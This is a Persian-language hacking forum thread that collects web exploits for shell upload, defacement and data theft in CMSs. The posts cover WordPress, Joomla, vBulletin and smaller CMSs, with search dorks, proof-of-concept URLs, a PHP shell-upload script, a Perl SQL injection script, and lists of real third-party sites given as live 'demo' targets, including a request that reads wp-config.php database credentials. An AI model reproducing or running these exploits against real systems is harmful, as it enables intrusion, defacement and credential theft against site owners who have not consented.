رفتن به مطلب
انجمن تیم امنیتی گارد ایران

ارسال های توصیه شده

درود بر تمامی عزیزان گارد ایران.

در این تاپیک اکسپلویت های مختلف قرار میگیرند.

اکسپلویت هایی از قبیل آپلود شل و دیفیس در CMS های مختلف.

 

قوانین تاپیک:

1-اسپم ممنوع

2-طرح سوال در بخش مربوطه.

3-چیزی به جز اکسپلویت در این تاپیک قرار نخواهد گرفت.

موفق باشید.

############################################################################################

Wordpress Plugin Slider Revolution 4.1.4

سلام

از طریق باگ پلاگین Slider Revolution می توان فایل config.php را دانلود و اطلاعات DataBase را مشاهده کرد.

DORK:

revslider.php "index of"

POC

http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

DEMO

www.redkatana.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
www.gaeliccollege.edu/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

 Joomla Aclsfgpl Shell Upload


[+] Author: TUNISIAN CYBER

[+] Exploit Title: Joomla Component com_aclsfgpl File Upload Vulnerability

[+] Date: 07-01-2014

[+] Category: WebApp

[+] Google Dork: :inurl:"index.php?option=com_aclsfgpl" add_form

[+] Tested on: KaliLinux

[+} Friend's blog: www.na3il.com

########################################################################################

+Exploit:

You can upload file (.php/.php.jpg...)

+P.O.C:

127.0.0.1/index.php?option=com_aclsfgpl&Itemid=[num]&ct=servs1&md=add_form

Shell path:

copy shell pic link or 127.0.0.1/components/com_aclsfgpl/photos/

Demo:

http://www.club-plongee.com/index.php?option=com_aclsfgpl&Itemid=155&ct=womenm&md=add_form

http://www.triclubsandiego.org/index.php?option=com_aclsfgpl&Itemid=269&ct=tcsd1&md=add_form

http://aero.decines.free.fr/modelisme/index.php?option=com_aclsfgpl&Itemid=90&ct=pet5&md=add_form

./3nD

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

Joomla VideoShare Shell Upload


-----------------------------------------------------------------------------------------------------------------------------------------

Google Dork : inurl:/components/com_hwdvideoshare

Exploit : depends fonction date() Same country, it's ideal.Attention at the time on the target and on the pc which attack.

-----------------------------------------------------------------------------------------------------------------------------------------

PostShell.php <?php $uploadfile="lo.php.vob"; $ch = curl_init("http://www.exemple.com/components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; echo "<br />"; $i = 0; for ($i=1;$i<9999;$i++) { $n = 4; $num = str_pad((int) $i,$n,"0",STR_PAD_LEFT); $filename = date('YmdH').$num.$uploadfile; $url = "http://www.exemple.com/tmp/".$filename; $c = curl_init("$url"); $postResult2 = curl_exec($c); $info = curl_getinfo($c); $httpcode = $info['http_code]; if($httpcode == 200){ echo $url; curl_close($c); exit; }

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

vBulletin YUI 2.9.0 Cross Site Scripting


[+] Author: TUNISIAN CYBER

[+] Exploit Title: vBulletin YUI 2.9.0 Cross Site Scripting vulnerability

[+] Date: 09-01-2014

[+] Category: WebApp

[+] Google Dork: :inurl:"clientscript/yui/uploader/assets/"

[+] Tested on: KaliLinux

[+} Friend's blog: www.na3il.com

########################################################################################

+Description:

YUI is a free, open source JavaScript and CSS library for building richly interactive web applications.

Used by vBulletin.

+Exploit:

YUI suffers from an xss vulnerability.

+P.O.C:

127.0.0.1/[PATH]/clientscript/yui/uploader/assets/uploader.swf?allowedDomain="})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf

Demo:

http://fansfoot.com/forum/core/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf

http://www.liveworkshop.com/forums/core/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf

http://www.mjjcommunity.com/forum/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf

http://www.wivesbehindthebadge.org/forums/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf

Patch:

Upgarde to 3.X Version.

./3nD

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

 vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection


#!/usr/bin/perl

use LWP::UserAgent;

use HTTP::Cookies;

use HTTP::Request::Common;

use MIME::Base64;

system $^O eq 'MSWin32' ? 'cls' : 'clear';

print "

+===================================================+

| vBulletin 5 Beta XX SQLi 0day |

| Author: Orestis Kourides |

| Web Site: http://www.cyitsec.net |

+===================================================+

";

if (@ARGV != 5) {

print "\r\nUsage: perl vb5exp.pl http://WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM\r\n";

exit;

}

$host = $ARGV[0];

$path = $ARGV[1];

$username = $ARGV[2];

$password = $ARGV[3];

$magicnum = $ARGV[4];

$encpath = encode_base64('http://'.$host.$path);

print "[+] Logging\n";

print "[+] Username: ".$username."\n";

print "[+] Password: ".$password."\n";

print "[+] MagicNum: ".$magicnum."\n";

print "[+] " .$host.$path."auth/login\n";

my $browser = LWP::UserAgent->new;

my $cookie_jar = HTTP::Cookies->new;

my $response = $browser->post( 'http://'.$host.$path.'auth/login',

[

'url' => $encpath,

'username' => $username,

'password' => $password,

],

Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',

User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',

);

$browser->cookie_jar( $cookie_jar );

my $browser = LWP::UserAgent->new;

$browser->cookie_jar( $cookie_jar );

print "[+] Requesting\n";

my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',

[

'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',

],

User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',

);

$data = $response->content;

if ($data =~ /(#((\\.)|[^\\#])*#)/) { print '[+] Version: '.$1 };

print "\n";

exit 1;

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

Web eXperts Shell Upload / SQL Injection


[+] Author: TUNISIAN CYBER

[+] Exploit Title: Web eXperts FileUpload/SQLi vulnerabilities

[+] Date: 14-01-2014

[+] Category: WebApp

[+] Google Dork: :intext:"Website Design & Developed By Web eXperts"

[+] Tested on: KaliLinux

[+} Friend's blog: www.na3il.com

########################################################################################

+Exploit:

Web eXperts suffers from a File Upload/SQLi vulnerabilities

1/File Upload:

+P.O.C:

127.0.0.1/[PATH]/addons/imagelibrary/insert_image.php?wysiwyg=

Shell path:

site.ltd/uploads/h4x3d.php.jpg

2/SQli:

127.0.0.1/products.php?category_id=sql

Demo:

http://www.strivesports.com//products.php?category_id=1'

http://www.hangal.com.pk/addons/imagelibrary/insert_image.php?wysiwyg=

http://www.strivesports.com/addons/imagelibrary/insert_image.php?wysiwyg=

http://www.sarsonss.com/products.php?category_id=1'

http://www.sirgeeintl.com/products.php?category_id=1'

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

  • 2 ماه بعد...


#######################################################

# [+] Title : Turkish Radyo CMS Sql Injection

# [+] Date : 07/11/2015

# [+] Tested on : Kali Linux - Windows 7

# [+] Category : webapps

# [+] Platforms: php

# [+] Google Dorks : inurl: haberoku.php?id=

# [+] Admin page : www.site.com/admin/

# [+] Exploit Author : M4ni4c

# [+] Team name : Azerbaijan Cyber Army

# [+] The Official Members : KRONiQS , NiKO , RiKO , M4ni4c , DADO , D4RT0N , Jason

# [+] Contact : fb.com/M4ni4c , fb.com/azecyberarmy , m4ni4c@box.az

# [+]Demo Sites:

# http://www.mizikXafm.com/haberoku.php?id=30

# http://www.kayXradyo.com/haberoku.php?id=43

# http://www.yilXdizfm.net/haberoku.php?id=207

#######################################################

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...